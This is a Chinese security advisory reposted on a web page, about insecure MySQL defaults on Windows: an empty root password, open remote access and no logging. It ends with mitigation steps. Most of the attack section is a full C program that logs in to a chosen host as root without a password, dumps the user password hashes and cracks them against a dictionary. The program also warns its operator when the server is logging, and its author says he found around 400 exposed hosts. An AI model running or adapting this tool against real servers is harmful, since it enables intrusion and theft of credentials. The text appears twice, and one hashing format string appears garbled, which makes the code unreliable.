| 導購 | 订阅 | 在线投稿
分享
 
 
 

Windows操作系統下的MySQL存在默認配置多個漏洞

來源:互聯網網民  2006-12-16 16:51:04  評論

受影響系統:

MySQL AB MySQL 3.23.9

MySQL AB MySQL 3.23.8

MySQL AB MySQL 3.23.52

MySQL AB MySQL 3.23.51

MySQL AB MySQL 3.23.50

MySQL AB MySQL 3.23.5

MySQL AB MySQL 3.23.49

MySQL AB MySQL 3.23.48

MySQL AB MySQL 3.23.47

MySQL AB MySQL 3.23.46

MySQL AB MySQL 3.23.45

MySQL AB MySQL 3.23.44

MySQL AB MySQL 3.23.43

MySQL AB MySQL 3.23.42

MySQL AB MySQL 3.23.41

MySQL AB MySQL 3.23.40

MySQL AB MySQL 3.23.4

MySQL AB MySQL 3.23.39

MySQL AB MySQL 3.23.38

MySQL AB MySQL 3.23.37

MySQL AB MySQL 3.23.36

MySQL AB MySQL 3.23.34

MySQL AB MySQL 3.23.31

MySQL AB MySQL 3.23.30

MySQL AB MySQL 3.23.3

MySQL AB MySQL 3.23.29

MySQL AB MySQL 3.23.28 gamma

MySQL AB MySQL 3.23.28

MySQL AB MySQL 3.23.27

MySQL AB MySQL 3.23.26

MySQL AB MySQL 3.23.25

MySQL AB MySQL 3.23.24

MySQL AB MySQL 3.23.23

MySQL AB MySQL 3.23.2

MySQL AB MySQL 3.23.10

MySQL AB MySQL 3.22.32

MySQL AB MySQL 3.22.30

MySQL AB MySQL 3.22.29

MySQL AB MySQL 3.22.28

MySQL AB MySQL 3.22.27

MySQL AB MySQL 3.22.26

- Microsoft Windows NT 4.0

- Microsoft Windows 98

- Microsoft Windows 2000

描述:

--------------------------------------------------------------------------------

BUGTRAQ ID: 5513

MySQL是一款開放源代碼關系數據庫系統,可使用在多種操作系統下,包括Microsoft Windows系統。

MySQL默認配置存在多個問題,遠程攻擊者可以利用這些漏洞訪問數據庫,更改數據庫操作或者攻擊不被記錄。

Windows下的MySQL默認配置存在3個問題:

1)默認ROOT空密碼問題:

MySQL允許通過內部數據庫系統表'mysql.user'管理用戶,這張表包括用戶的用戶名,密碼和主機字段,MySQL默認情況下沒有對ROOT帳戶設置密碼,攻擊者可以使用這個帳戶無需密碼登錄。

2)非回環地址綁定問題:

大多數MySQL用戶在WEB服務器相同主機上安裝運行MySQL數據庫,在MySQL配置文件中,其中的'bind-address=127.0.0.1'一行被注釋掉的,如果服務器綁定爲回環地址中,就只允許運行數據庫的主機進行訪問,但是由于這一行被注釋,所以MySQL數據庫運行任意用戶從任意主機上登錄訪問,結合ROOT用戶空密碼漏洞,就可以以ROOT權限訪問數據庫。

上面兩個問題是:

Windows平台默認安裝的MySQL的user表是這樣的:

mysql> select Host,User,Password,Select_priv,Grant_priv from user;

+-----------+------+----------+-------------+------------+

| Host | User | Password | Select_priv | Grant_priv |

+-----------+------+----------+-------------+------------+

| localhost | root | | Y | Y |

| % | root | | Y | Y |

| localhost | | | Y | Y |

| % | | | N | N |

+-----------+------+----------+-------------+------------+

其設置ROOT密碼爲空,而且主機字段爲'%',表示允許可從所有主機進行連接。所以Windows下的MySQL可以以ROOT用戶名無需密碼從任意主機登錄數據庫。

3)沒有日志功能:

日志是任何軟件所必須的一部分,MySQL默認情況下在Windows系統中不進行日志記錄,這意味著管理員將不能檢測數據庫是否被破壞,或者攻擊者進行暴力攻擊進行帳戶猜測,也不會被記錄。

<*來源:Mike Bommarito (g0thm0g@attbi.com)

鏈接:http://marc.theaimsgroup.com/?l=bugtraq&m=102978779419465&w=2

*>

測試方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!

Mike Bommarito(g0thm0g@attbi.com) 提供了如下測試程序:

//mysqlfuck.c

/*--||MySQLfuck||--*/

/*Written by g0thm0g*/

/*-----------------*/

/*Earlier this summer (at least where I live), I had a

conversation with a friend.

It was one of those afternoons where you get an idea,

and it kinda sticks with you.

Anyway, our conversation involved a couple questions

about INSERT's into a MySQL

database. Eventually, I told him that I would do it

for him. I came over, sat down

on his computer, and accidentally typed his full IP

address in. TO my surprise, the

host still connected. Even worse, root login wasn't

passworded. I figured that he

had mysql bound to 127.0.0.1, and that no real remote

host could connect. However,

later that night after I had gone home, I got a phone

call from the friend asking me

to do it again. Already on the computer (go figure

d:), I pulled up bash and

typed in his IP. Right as I was about to ask him what

his password was, I noticed

that MySQL hadn't even bothered to authenticate me. I

"used mysql" and then SELECT'ed

user,password,host FROM user. To my horror, I recieved:

+------+----------+-----------+

| user | password | host |

+------+----------+-----------+

| root | | localhost |

| root | | % |

| | | localhost |

| | | % |

+------+----------+-----------+

Not only was name-less login allowed, but root was

without password on localhost

and remote. Anyway, to make a long story short, I did

some research, and found that

default Windows MySQL configuration lacks logging or

authentication. I did some

network scanning, and I think I have around 400 hosts

with no root password. Anyway,

to automate checking this, I wrote this program up. It

tries to login as root/NULL,

then takes the values of the user password hashes and

tries to find a match to a

dictionary file called dictionary.txt.

I wrote up an advisory, which you'll probably see on

SecFoc soon.

If I had some cookies, I'd give them to:

-Tiefer and his relentless questioning and jokes about

my sister

-Club 21, especially for Hard Attack

-DJ Doboy, can't forget trancequility volume 19

(INSERT STANDARD "NOT-TO-BE-USED-FOR-ILLEGAL-USE"

CLAUSE HERE)

(INSERT STANDARD "I-HOLD-NO-LIABILITY" CLAUSE HERE)

Compile:

-MSVC= cl mysqlfuck.c libmySQL.lib /DWIN32 -O2

-GCC= gcc -omysqlfuck mysqlfuck.c -lmySQL -O2

-Cheers

g0th

*/

#include <stdio.h>

#ifdef WIN32

#include <windows.h>

#endif

#include <mysql.h>

/*_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*?

/*Crazy MySQL programmers and their short typedefs*/

/*-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*/

#ifndef ulong

#define ulong unsigned long

#endif

#ifndef uint

#define uint unsigned int

#endif

#ifndef uchar

#define uchar unsigned char

#endif

/*_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*?

/*##--####--####--####--####--####--####--####--##*/

/*-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*/

/*--------------------------------------------------------------*/

/*<<<<This section is ripped straight from the MySQL

source.>>>>*/

/*I have this all nice and optimized in assembly on my

end, but*/

/*writing cross-compiler inline is not too fun, and

requring an*/

/*assembler is kinda frustrating.*/

/*--------------------------------------------------------------*/

void hash_password(ulong *result, const char *password)

{

register ulong nr=1345345333L, add=7, nr2=0x12345671L;

ulong tmp;

for (; *password ; password++)

{

if (*password == ' ' || *password == '\t')

continue; /* skipp space in password */

tmp= (ulong) (uchar) *password;

nr^= (((nr & 63)+add)*tmp)+ (nr << 8);

nr2+=(nr2 << 8) ^ nr;

add+=tmp;

}

result[0]=nr & 2147483647; /* Don't use sign bit

(str2int) */;

result[1]=nr2 & 2147483647;

return;

}

void make_scrambled_password(char *to,const char *password)

{

ulong hash_res[2];

hash_password(hash_res,password);

sprintf(to,"0000000000000000",hash_res[0],hash_res[1]);

}

/*--------------------------------------------------------------*/

/*<<<<######################################################>>>>*/

/*--------------------------------------------------------------*/

/*%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%*/

/*--------------------------------*/

/*<<<user struct to store data>>>>*/

/*--------------------------------*/

typedef struct

{

char *user;

char *password;

} user;

#define MAX_USERS 16

/*--------------------------------*/

/*<<<<########################>>>>*/

/*--------------------------------*/

//main - for "coherency's" (yes, i mean laziness) sake,

i've kept this a single function

int

main

(

int argc,

char** argv

)

{

MYSQL * mysqlData; //--|-

MYSQL_RES * mysqlResult; //--|-MySQL Datatypes

MYSQL_ROW mysqlRow; //--|-

char *spHost; //--|

char *spUser="root"; //--|

char *spPassword=NULL; //--|-Our connection data

int spPort=3306; //--|

char *spServerVersion; //--|

int usernum=0; //--|

user *users[MAX_USERS]; //--|-User name/hash storage

data

FILE *fin, *fout; //--|

char *file_name; //--|-File I/O data

char *line=(char *)malloc(64); //--|

char *buff=(char *)malloc(64); //--|-Miscellaneous

buffers

int i=0; //--|Counter

//Warn about not meeting minimal arguments

if (2>argc)

{

fprintf (stderr, "usage: mysqlfuck host [-p<port>]");

return -1;

}

//Copy the first argument into the host buffer

spHost=(char *)malloc(sizeof(argv[1]));

strcpy (spHost, argv[1]);

//Copy port if the user specified

if (argv[2])

{

if (argv[2][1]=='p')

{

++argv[2];

++argv[2];

spPort=atoi(argv[2]);

printf ("port: %i\n", spPort);

}

}

//Initialize MySQL data and connect with root/NULL

mysqlData = (MYSQL *)malloc(sizeof(MYSQL));

mysql_init (mysqlData);

if (! mysql_real_connect (mysqlData, spHost, spUser,

spPassword, "mysql", spPort, NULL, 0) )

{

fprintf (stderr, "mysql_real_connect: %s\n",

mysql_error (mysqlData));

return -1;

}

//If the server logs, inform the user!

printf ("server version: %s\n",

mysql_get_server_info(mysqlData));

if (strstr (mysql_get_server_info (mysqlData), "log"))

{

printf ("Warning! Server is logging - Continue(*/n)?");

if (getchar()=='n')

{

mysql_close (mysqlData);

return -1;

}

}

//"Obtain" the hashes (notice i didn't use the word

steal)

if ( mysql_query (mysqlData, "SELECT user,password

FROM user") )

{

fprintf (stderr, "mysql_query: %s\n", mysql_error

(mysqlData));

return -1;

}

//Store the result and process it

mysqlResult=mysql_store_result(mysqlData);

while (mysqlRow=mysql_fetch_row(mysqlResult))

{

if (strlen(mysqlRow[0])==0)

{

mysqlRow[0]="(NULL)";

}

if (strlen(mysqlRow[1])==0)

{

mysqlRow[1]="(NULL)";

}

users[usernum]=(user *)malloc(sizeof(user));

users[usernum]->user=(char

*)malloc(strlen(mysqlRow[0])+1);

strcpy (users[usernum]->user, mysqlRow[0]);

users[usernum]->password=(char

*)malloc(strlen(mysqlRow[1])+1);

strcpy (users[usernum]->password, mysqlRow[1]);

usernum++;

}

mysql_close (mysqlData);

//Setup putput file name string

file_name=(char *)malloc (sizeof(spHost)+4);

strcpy (file_name, spHost);

strcat (file_name, ".txt\0\0");

printf ("\n+----------------------------+\n");

printf ("<decrypting and dumping to %s>\n", file_name);

printf ("+----------------------------+\n");

fout=fopen (spHost, "w");

if (!fout)

{

fprintf (stderr, "Unable to open %s for password

dumping\n", spHost);

return -1;

}

//Use a database to crack the hashes (optional)

fin=fopen ("dictionary.txt", "r");

if (!fin)

{

fprintf (stderr, "error opening dictionary.txt - no

decryption will take place\n");

for (i=0;i<usernum;i++)

{

printf ("%s::%s\n", users[i]->user,

users[i]->password);

}

return -1;

}

//Loop through the user array and crack/output hashes

for (i=0;i<usernum;i++)

{

if (users[i]->user)

{

if (users[i]->password)

{

while ( (fgets (line, 63, fin)))

{

line[strlen(line)-1]='\0';

make_scrambled_password (buff, line);

if (strcmp (buff, users[i]->password)==0)

{

users[i]->password=line;

break;

}

}

fclose (fin);

fprintf (fout, "%s::%s\n", users[i]->user,

users[i]->password);

printf ("%s::%s\n", users[i]->user,

users[i]->password);

fflush (fout);

}

}

}

//Always clean up after yourself!

fclose (fout);

if (buff)

free (buff);

if (line)

free (line);

if (spHost)

free (spHost);

if (users)

free (users);

if (file_name)

free (file_name);

if (mysqlData)

free (mysqlData);

}

建議:

--------------------------------------------------------------------------------

臨時解決方法:

如果您不能立刻安裝補丁或者升級,NSFOCUS建議您采取以下措施以降低威脅:

* 1) 給root加口令

mysql> set password for root@localhost=password('password');

* 2) 刪除User表裏匿名用戶和Host字段爲%的記錄

mysql> delete from user where user='';

mysql> delete from user where host='%';

mysql> flush privileges

* 3) 把配置文件中的'bind-address=127.0.0.1'注釋符去掉,然後重新啓動MySQL。

* 4) 在my.ini中增加:

log-long-format

log=/path/to/somewhere/log.txt

然後重新啓動MySQL。

廠商補丁:

MySQL AB

--------

目前廠商還沒有提供補丁或者升級程序,我們建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本:

http://www.mysql.com/

 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
受影響系統: MySQL AB MySQL 3.23.9 MySQL AB MySQL 3.23.8 MySQL AB MySQL 3.23.52 MySQL AB MySQL 3.23.51 MySQL AB MySQL 3.23.50 MySQL AB MySQL 3.23.5 MySQL AB MySQL 3.23.49 MySQL AB MySQL 3.23.48 MySQL AB MySQL 3.23.47 MySQL AB MySQL 3.23.46 MySQL AB MySQL 3.23.45 MySQL AB MySQL 3.23.44 MySQL AB MySQL 3.23.43 MySQL AB MySQL 3.23.42 MySQL AB MySQL 3.23.41 MySQL AB MySQL 3.23.40 MySQL AB MySQL 3.23.4 MySQL AB MySQL 3.23.39 MySQL AB MySQL 3.23.38 MySQL AB MySQL 3.23.37 MySQL AB MySQL 3.23.36 MySQL AB MySQL 3.23.34 MySQL AB MySQL 3.23.31 MySQL AB MySQL 3.23.30 MySQL AB MySQL 3.23.3 MySQL AB MySQL 3.23.29 MySQL AB MySQL 3.23.28 gamma MySQL AB MySQL 3.23.28 MySQL AB MySQL 3.23.27 MySQL AB MySQL 3.23.26 MySQL AB MySQL 3.23.25 MySQL AB MySQL 3.23.24 MySQL AB MySQL 3.23.23 MySQL AB MySQL 3.23.2 MySQL AB MySQL 3.23.10 MySQL AB MySQL 3.22.32 MySQL AB MySQL 3.22.30 MySQL AB MySQL 3.22.29 MySQL AB MySQL 3.22.28 MySQL AB MySQL 3.22.27 MySQL AB MySQL 3.22.26 - Microsoft Windows NT 4.0 - Microsoft Windows 98 - Microsoft Windows 2000 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 5513 MySQL是一款開放源代碼關系數據庫系統,可使用在多種操作系統下,包括Microsoft Windows系統。 MySQL默認配置存在多個問題,遠程攻擊者可以利用這些漏洞訪問數據庫,更改數據庫操作或者攻擊不被記錄。 Windows下的MySQL默認配置存在3個問題: 1)默認ROOT空密碼問題: MySQL允許通過內部數據庫系統表'mysql.user'管理用戶,這張表包括用戶的用戶名,密碼和主機字段,MySQL默認情況下沒有對ROOT帳戶設置密碼,攻擊者可以使用這個帳戶無需密碼登錄。 2)非回環地址綁定問題: 大多數MySQL用戶在WEB服務器相同主機上安裝運行MySQL數據庫,在MySQL配置文件中,其中的'bind-address=127.0.0.1'一行被注釋掉的,如果服務器綁定爲回環地址中,就只允許運行數據庫的主機進行訪問,但是由于這一行被注釋,所以MySQL數據庫運行任意用戶從任意主機上登錄訪問,結合ROOT用戶空密碼漏洞,就可以以ROOT權限訪問數據庫。 上面兩個問題是: Windows平台默認安裝的MySQL的user表是這樣的: mysql> select Host,User,Password,Select_priv,Grant_priv from user; +-----------+------+----------+-------------+------------+ | Host | User | Password | Select_priv | Grant_priv | +-----------+------+----------+-------------+------------+ | localhost | root | | Y | Y | | % | root | | Y | Y | | localhost | | | Y | Y | | % | | | N | N | +-----------+------+----------+-------------+------------+ 其設置ROOT密碼爲空,而且主機字段爲'%',表示允許可從所有主機進行連接。所以Windows下的MySQL可以以ROOT用戶名無需密碼從任意主機登錄數據庫。 3)沒有日志功能: 日志是任何軟件所必須的一部分,MySQL默認情況下在Windows系統中不進行日志記錄,這意味著管理員將不能檢測數據庫是否被破壞,或者攻擊者進行暴力攻擊進行帳戶猜測,也不會被記錄。 <*來源:Mike Bommarito (g0thm0g@attbi.com) 鏈接:http://marc.theaimsgroup.com/?l=bugtraq&m=102978779419465&w=2 *> 測試方法: -------------------------------------------------------------------------------- 警 告 以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負! Mike Bommarito(g0thm0g@attbi.com) 提供了如下測試程序: //mysqlfuck.c /*--||MySQLfuck||--*/ /*Written by g0thm0g*/ /*-----------------*/ /*Earlier this summer (at least where I live), I had a conversation with a friend. It was one of those afternoons where you get an idea, and it kinda sticks with you. Anyway, our conversation involved a couple questions about INSERT's into a MySQL database. Eventually, I told him that I would do it for him. I came over, sat down on his computer, and accidentally typed his full IP address in. TO my surprise, the host still connected. Even worse, root login wasn't passworded. I figured that he had mysql bound to 127.0.0.1, and that no real remote host could connect. However, later that night after I had gone home, I got a phone call from the friend asking me to do it again. Already on the computer (go figure d:), I pulled up bash and typed in his IP. Right as I was about to ask him what his password was, I noticed that MySQL hadn't even bothered to authenticate me. I "used mysql" and then SELECT'ed user,password,host FROM user. To my horror, I recieved: +------+----------+-----------+ | user | password | host | +------+----------+-----------+ | root | | localhost | | root | | % | | | | localhost | | | | % | +------+----------+-----------+ Not only was name-less login allowed, but root was without password on localhost and remote. Anyway, to make a long story short, I did some research, and found that default Windows MySQL configuration lacks logging or authentication. I did some network scanning, and I think I have around 400 hosts with no root password. Anyway, to automate checking this, I wrote this program up. It tries to login as root/NULL, then takes the values of the user password hashes and tries to find a match to a dictionary file called dictionary.txt. I wrote up an advisory, which you'll probably see on SecFoc soon. If I had some cookies, I'd give them to: -Tiefer and his relentless questioning and jokes about my sister -Club 21, especially for Hard Attack -DJ Doboy, can't forget trancequility volume 19 (INSERT STANDARD "NOT-TO-BE-USED-FOR-ILLEGAL-USE" CLAUSE HERE) (INSERT STANDARD "I-HOLD-NO-LIABILITY" CLAUSE HERE) Compile: -MSVC= cl mysqlfuck.c libmySQL.lib /DWIN32 -O2 -GCC= gcc -omysqlfuck mysqlfuck.c -lmySQL -O2 -Cheers g0th */ #include <stdio.h> #ifdef WIN32 #include <windows.h> #endif #include <mysql.h> /*_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*? /*Crazy MySQL programmers and their short typedefs*/ /*-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*/ #ifndef ulong #define ulong unsigned long #endif #ifndef uint #define uint unsigned int #endif #ifndef uchar #define uchar unsigned char #endif /*_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*? /*##--####--####--####--####--####--####--####--##*/ /*-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*/ /*--------------------------------------------------------------*/ /*<<<<This section is ripped straight from the MySQL source.>>>>*/ /*I have this all nice and optimized in assembly on my end, but*/ /*writing cross-compiler inline is not too fun, and requring an*/ /*assembler is kinda frustrating.*/ /*--------------------------------------------------------------*/ void hash_password(ulong *result, const char *password) { register ulong nr=1345345333L, add=7, nr2=0x12345671L; ulong tmp; for (; *password ; password++) { if (*password == ' ' || *password == '\t') continue; /* skipp space in password */ tmp= (ulong) (uchar) *password; nr^= (((nr & 63)+add)*tmp)+ (nr << 8); nr2+=(nr2 << 8) ^ nr; add+=tmp; } result[0]=nr & 2147483647; /* Don't use sign bit (str2int) */; result[1]=nr2 & 2147483647; return; } void make_scrambled_password(char *to,const char *password) { ulong hash_res[2]; hash_password(hash_res,password); sprintf(to,"0000000000000000",hash_res[0],hash_res[1]); } /*--------------------------------------------------------------*/ /*<<<<######################################################>>>>*/ /*--------------------------------------------------------------*/ /*%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%*/ /*--------------------------------*/ /*<<<user struct to store data>>>>*/ /*--------------------------------*/ typedef struct { char *user; char *password; } user; #define MAX_USERS 16 /*--------------------------------*/ /*<<<<########################>>>>*/ /*--------------------------------*/ //main - for "coherency's" (yes, i mean laziness) sake, i've kept this a single function int main ( int argc, char** argv ) { MYSQL * mysqlData; //--|- MYSQL_RES * mysqlResult; //--|-MySQL Datatypes MYSQL_ROW mysqlRow; //--|- char *spHost; //--| char *spUser="root"; //--| char *spPassword=NULL; //--|-Our connection data int spPort=3306; //--| char *spServerVersion; //--| int usernum=0; //--| user *users[MAX_USERS]; //--|-User name/hash storage data FILE *fin, *fout; //--| char *file_name; //--|-File I/O data char *line=(char *)malloc(64); //--| char *buff=(char *)malloc(64); //--|-Miscellaneous buffers int i=0; //--|Counter //Warn about not meeting minimal arguments if (2>argc) { fprintf (stderr, "usage: mysqlfuck host [-p<port>]"); return -1; } //Copy the first argument into the host buffer spHost=(char *)malloc(sizeof(argv[1])); strcpy (spHost, argv[1]); //Copy port if the user specified if (argv[2]) { if (argv[2][1]=='p') { ++argv[2]; ++argv[2]; spPort=atoi(argv[2]); printf ("port: %i\n", spPort); } } //Initialize MySQL data and connect with root/NULL mysqlData = (MYSQL *)malloc(sizeof(MYSQL)); mysql_init (mysqlData); if (! mysql_real_connect (mysqlData, spHost, spUser, spPassword, "mysql", spPort, NULL, 0) ) { fprintf (stderr, "mysql_real_connect: %s\n", mysql_error (mysqlData)); return -1; } //If the server logs, inform the user! printf ("server version: %s\n", mysql_get_server_info(mysqlData)); if (strstr (mysql_get_server_info (mysqlData), "log")) { printf ("Warning! Server is logging - Continue(*/n)?"); if (getchar()=='n') { mysql_close (mysqlData); return -1; } } //"Obtain" the hashes (notice i didn't use the word steal) if ( mysql_query (mysqlData, "SELECT user,password FROM user") ) { fprintf (stderr, "mysql_query: %s\n", mysql_error (mysqlData)); return -1; } //Store the result and process it mysqlResult=mysql_store_result(mysqlData); while (mysqlRow=mysql_fetch_row(mysqlResult)) { if (strlen(mysqlRow[0])==0) { mysqlRow[0]="(NULL)"; } if (strlen(mysqlRow[1])==0) { mysqlRow[1]="(NULL)"; } users[usernum]=(user *)malloc(sizeof(user)); users[usernum]->user=(char *)malloc(strlen(mysqlRow[0])+1); strcpy (users[usernum]->user, mysqlRow[0]); users[usernum]->password=(char *)malloc(strlen(mysqlRow[1])+1); strcpy (users[usernum]->password, mysqlRow[1]); usernum++; } mysql_close (mysqlData); //Setup putput file name string file_name=(char *)malloc (sizeof(spHost)+4); strcpy (file_name, spHost); strcat (file_name, ".txt\0\0"); printf ("\n+----------------------------+\n"); printf ("<decrypting and dumping to %s>\n", file_name); printf ("+----------------------------+\n"); fout=fopen (spHost, "w"); if (!fout) { fprintf (stderr, "Unable to open %s for password dumping\n", spHost); return -1; } //Use a database to crack the hashes (optional) fin=fopen ("dictionary.txt", "r"); if (!fin) { fprintf (stderr, "error opening dictionary.txt - no decryption will take place\n"); for (i=0;i<usernum;i++) { printf ("%s::%s\n", users[i]->user, users[i]->password); } return -1; } //Loop through the user array and crack/output hashes for (i=0;i<usernum;i++) { if (users[i]->user) { if (users[i]->password) { while ( (fgets (line, 63, fin))) { line[strlen(line)-1]='\0'; make_scrambled_password (buff, line); if (strcmp (buff, users[i]->password)==0) { users[i]->password=line; break; } } fclose (fin); fprintf (fout, "%s::%s\n", users[i]->user, users[i]->password); printf ("%s::%s\n", users[i]->user, users[i]->password); fflush (fout); } } } //Always clean up after yourself! fclose (fout); if (buff) free (buff); if (line) free (line); if (spHost) free (spHost); if (users) free (users); if (file_name) free (file_name); if (mysqlData) free (mysqlData); } 建議: -------------------------------------------------------------------------------- 臨時解決方法: 如果您不能立刻安裝補丁或者升級,NSFOCUS建議您采取以下措施以降低威脅: * 1) 給root加口令 mysql> set password for root@localhost=password('password'); * 2) 刪除User表裏匿名用戶和Host字段爲%的記錄 mysql> delete from user where user=''; mysql> delete from user where host='%'; mysql> flush privileges * 3) 把配置文件中的'bind-address=127.0.0.1'注釋符去掉,然後重新啓動MySQL。 * 4) 在my.ini中增加: log-long-format log=/path/to/somewhere/log.txt 然後重新啓動MySQL。 廠商補丁: MySQL AB -------- 目前廠商還沒有提供補丁或者升級程序,我們建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本: http://www.mysql.com/
󰈣󰈤
王朝萬家燈火計劃
期待原創作者加盟
 
 
 
>>返回首頁<<
 
 
 
 
 
 熱帖排行
 
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有